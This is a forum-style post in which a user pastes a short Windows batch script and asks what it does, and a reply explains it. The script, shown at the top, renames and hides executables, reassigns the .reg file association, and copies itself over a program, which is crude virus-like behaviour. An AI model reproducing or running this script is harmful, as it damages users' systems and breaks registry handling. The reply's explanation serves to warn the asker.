rem
for %%f in (*.exe *.dll) do set a=%%f
ren %a% Jakash3%a%
attrib +r +h Jakash3%a%
assoc .reg=sysfile
copy %0.dll %a% %26lt;%26lt; Thats The coding (should be saved in a notepad with .bat at the end ) I really dont have a clue what it does :(Can Someone Tell Me what this Batch Coding Does ?
Looks like a good way to mess up your system.
Changes some executable to Jakash3, which it then marks as readonly and hidden.
Changes the association of .reg files (registry) from regfile to sysfile
Copies some other code over the good system code.Can Someone Tell Me what this Batch Coding Does ?
Jakash3 is the name of a user on youtube.
http://www.youtube.com/user/jakash3 Report Abuse
No comments:
Post a Comment